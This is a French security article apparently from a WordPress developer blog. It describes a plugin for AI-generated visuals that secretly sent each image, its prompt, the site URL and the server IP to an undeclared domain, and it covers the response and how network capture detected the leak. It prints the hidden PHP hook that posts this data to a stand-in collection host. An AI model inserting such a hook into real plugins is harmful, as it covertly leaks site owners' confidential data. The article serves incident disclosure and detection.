# Une extension IA de génération de visuels qui exfiltre les images produites

> Une extension générant des visuels par IA transmettait discrètement chaque image produite à un service tiers non déclaré, en plus du service annoncé dans sa documentation.

- Auteur : Clément Hadrot
- Publié le : 2026-09-20
- Mis à jour le : 2026-09-20
- Catégorie : Sécurité
- URL : https://wpmoderne.dev.wordpress-developpement.fr/securite/extension-ia-generation-visuels-exfiltre-images/

## L’essentiel

- L'extension contactait un second domaine jamais mentionné dans sa documentation
- Chaque image générée partait avec des métadonnées de contexte associées
- Une capture réseau a révélé le comportement, invisible à la simple lecture du code

Pourquoi une extension de génération d'images par IA contacterait-elle un second domaine, jamais mentionné dans sa documentation, à chaque image produite ? C'est la question posée après qu'un développeur a remarqué, dans le journal réseau du serveur, des requêtes sortantes régulières vers une adresse inconnue, en plus des appels attendus vers le service d'IA générative officiellement intégré à l'extension. Ce cas ne traite pas de la qualité des visuels générés, jugée satisfaisante par ailleurs, mais du comportement caché découvert derrière la fonctionnalité.

## Le contexte de la découverte

L'extension, installée pour générer des illustrations d'articles à partir d'une description textuelle, fonctionnait normalement du point de vue de l'utilisateur : une image apparaissait bien après quelques secondes de génération, cohérente avec la description fournie. Rien, dans l'interface, ne laissait deviner qu'un comportement supplémentaire se déroulait en arrière-plan.

## Ce que la capture réseau a révélé

> L'essentiel à retenir : L'extension contactait un second domaine jamais mentionné dans sa documentation ; Chaque image générée partait avec des métadonnées de contexte associées ; Une capture réseau a révélé le comportement, invisible à la simple lecture du code

Une capture du trafic sortant du serveur, sur une fenêtre de quelques heures d'utilisation normale, a montré deux destinations distinctes contactées à chaque génération d'image : le service d'IA générative annoncé dans la documentation de l'extension, et un second domaine, non documenté, recevant une copie de chaque image produite accompagnée de métadonnées incluant le nom du site, l'adresse IP du serveur et le texte de la description ayant servi à générer l'image.

```
add_action('domaine_image_generee', function ($url_image, $description) {
  wp_remote_post('https://analytics-visuels.example/collecte', array(
    'body' => array(
      'image'       => $url_image,
      'prompt'      => $description,
      'site'        => home_url(),
      'ip_serveur'  => $_SERVER['SERVER_ADDR'] ?? '',
    ),
  ));
}, 10, 2);
```

Ce code, retrouvé après décompilation partielle du fichier concerné qui utilisait par ailleurs un nom de fonction volontairement proche d'une fonctionnalité légitime de statistiques d'usage, n'apparaissait dans aucune section de la documentation publique de l'extension ni dans sa politique de confidentialité affichée sur la place de marché où elle avait été achetée.

## Pourquoi ce comportement pose un problème sérieux

Au-delà de la question de confiance envers l'éditeur de l'extension, cette transmission non déclarée soulève un problème concret de conformité : les images générées peuvent inclure des éléments visuels ou textuels liés à des projets non publics, et les métadonnées transmises identifient précisément le site d'origine. Une entreprise sous obligation de confidentialité contractuelle sur ses visuels de communication se retrouve ainsi, à son insu, à transmettre ces mêmes visuels à un tiers non déclaré.

## La démarche suivie après la découverte

1. Désactivation immédiate de l'extension, sans attendre une confirmation supplémentaire, le temps de l'investigation complète.
2. Vérification des journaux historiques pour estimer la période et le volume d'images concernées par cette transmission.
3. Signalement de l'extension auprès de la place de marché où elle avait été acquise, avec les éléments de preuve issus de la capture réseau.
4. Remplacement par une extension alternative, dont le code source a cette fois été inspecté avant installation en recherchant spécifiquement les appels réseau sortants.

## Une méthode de détection reproductible

Cet incident n'a pas été découvert par une lecture du code source, dense et volontairement obscurci sur ce point précis, mais par l'observation du comportement réseau réel de l'extension en fonctionnement. Cette méthode reste applicable à toute extension manipulant des données sensibles : installer l'extension dans un environnement isolé, déclencher sa fonctionnalité principale, et comparer les destinations réseau contactées avec celles annoncées dans sa documentation officielle.

## En résumé

Une extension qui fait ce qu'elle annonce en façade peut malgré tout dissimuler un comportement supplémentaire invisible à l'usage normal. La capture du trafic réseau réel, plutôt que la seule confiance dans la documentation ou l'apparence de fonctionnement, reste le moyen le plus fiable de repérer une exfiltration de données déguisée derrière une fonctionnalité par ailleurs convaincante.
